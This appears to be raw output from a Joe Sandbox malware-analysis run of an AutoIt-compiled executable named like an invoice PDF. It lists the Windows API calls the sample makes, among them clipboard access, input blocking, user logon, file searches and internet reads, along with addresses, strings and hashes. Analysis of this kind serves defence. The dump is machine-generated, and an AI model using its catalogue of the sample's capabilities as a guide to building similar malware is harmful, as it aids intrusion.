                                                                              • IsZoomed.USER32 ref: 0047734D
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                              • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: ACCEPT$^$h
                                                                              • API String ID: 909875538-4263704089
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ERCP$VUUU$VUUU$VUUU
                                                                              • API String ID: 0-2165971703
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 004433A2
                                                                                • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: rJ
                                                                              • API String ID: 2893107130-1865492326
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 004433A2
                                                                                • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: rJ
                                                                              • API String ID: 2893107130-1865492326
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                              • String ID:
                                                                              • API String ID: 901099227-0
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                              • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0vH$HH
                                                                              • API String ID: 0-728391547
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID:
                                                                              • API String ID: 2102423945-0
                                                                              APIs
                                                                              • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                              Similarity
                                                                              • API ID: Proc
                                                                              • String ID:
                                                                              • API String ID: 2346855178-0
                                                                              APIs
                                                                              • BlockInput.USER32(00000001), ref: 0045A272
                                                                              Similarity
                                                                              • API ID: BlockInput
                                                                              • String ID:
                                                                              • API String ID: 3456056419-0
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 004593D7
                                                                              • DeleteObject.GDI32(?), ref: 004593F1
                                                                              • DestroyWindow.USER32(?), ref: 00459407
                                                                              • GetDesktopWindow.USER32 ref: 0045942A
                                                                              • GetWindowRect.USER32(00000000), ref: 00459431
                                                                              • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                              • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                              • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                              • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                              • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                              • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                              • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                              • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                              • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                              • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                              • _wcslen.LIBCMT ref: 00459800
                                                                              • _wcscpy.LIBCMT ref: 0045981F
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                              • GetDC.USER32(?), ref: 004598DE
                                                                              • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                              • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                              • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 4040870279-2373415609
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 00441E64
                                                                              • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                              • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                              • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                              • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                              • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                              • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                              • DeleteObject.GDI32(?), ref: 00441F1B
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                              • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                              • String ID:
                                                                              • API String ID: 69173610-0
                                                                              • Opcode ID: 16bc1a18b3a07106aeda8c8eb773dca30e083f4fb16077f1b688697113e0bbf3
                                                                              • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                              • Opcode Fuzzy Hash: 16bc1a18b3a07106aeda8c8eb773dca30e083f4fb16077f1b688697113e0bbf3
                                                                              • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-3360698832
                                                                              • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                              • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                              APIs
                                                                              • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                              • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                              • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                              • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                              • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                              • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                              • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                              • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                              • SelectObject.GDI32(?,?), ref: 00433E29
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                              • GetWindowLongW.USER32 ref: 00433E8A
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                              • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                              • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                              • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                              • SelectObject.GDI32(?,?), ref: 00433F63
                                                                              • DeleteObject.GDI32(?), ref: 00433F70
                                                                              • SelectObject.GDI32(?,?), ref: 00433F78
                                                                              • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                              • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                              • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1582027408-0
                                                                              • Opcode ID: 5c700382b0f14bea5dcc0f3524be5f901cccb018765d911b3c47581d8565f159
                                                                              • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                              • Opcode Fuzzy Hash: 5c700382b0f14bea5dcc0f3524be5f901cccb018765d911b3c47581d8565f159
                                                                              • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                              APIs
                                                                              • OpenClipboard.USER32(?), ref: 0046C635
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                              • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                              • CloseClipboard.USER32 ref: 0046C65D
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                              • CloseClipboard.USER32 ref: 0046C692
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                              • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                              • CloseClipboard.USER32 ref: 0046C866
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                              • String ID: HH
                                                                              • API String ID: 589737431-2761332787
                                                                              • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                              • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                              • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                              • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00456692
                                                                              • GetDesktopWindow.USER32 ref: 004566AA
                                                                              • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                              • DestroyWindow.USER32(?), ref: 00456731
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                              • IsWindowVisible.USER32(?), ref: 00456812
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                              • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                              • GetMonitorInfoW.USER32 ref: 00456894
                                                                              • CopyRect.USER32(?,?), ref: 004568A8
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                              • String ID: ($,$tooltips_class32
                                                                              • API String ID: 541082891-3320066284
                                                                              • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                              • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00454DCF
                                                                              • _wcslen.LIBCMT ref: 00454DE2
                                                                              • __wcsicoll.LIBCMT ref: 00454DEF
                                                                              • _wcslen.LIBCMT ref: 00454E04
                                                                              • __wcsicoll.LIBCMT ref: 00454E11
                                                                              • _wcslen.LIBCMT ref: 00454E24
                                                                              • __wcsicoll.LIBCMT ref: 00454E31
                                                                                • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                              • DestroyIcon.USER32(?), ref: 00454FA2
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 2511167534-1154884017
                                                                              • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                              • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                              • _wcslen.LIBCMT ref: 00436B79
                                                                              • _wcscpy.LIBCMT ref: 00436B9F
                                                                              • _wcscat.LIBCMT ref: 00436BC0
                                                                              • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                              • _wcscat.LIBCMT ref: 00436C2A
                                                                              • _wcscat.LIBCMT ref: 00436C31
                                                                              • __wcsicoll.LIBCMT ref: 00436C4B
                                                                              • _wcsncpy.LIBCMT ref: 00436C62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 1503153545-1459072770
                                                                              • Opcode ID: 5c06c38aad06ba9183ae50064a228cafd09009ecea8a617b0955aba59ee89a04
                                                                              • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                              • Opcode Fuzzy Hash: 5c06c38aad06ba9183ae50064a228cafd09009ecea8a617b0955aba59ee89a04
                                                                              • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: 3869ee65e4d29b87c0edc9205054f265a76e83686c8c9ab54da338a9757d3997
                                                                              • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                              • Opcode Fuzzy Hash: 3869ee65e4d29b87c0edc9205054f265a76e83686c8c9ab54da338a9757d3997
                                                                              • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                              • GetClientRect.USER32(?,?), ref: 004701FA
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                              • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                              • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
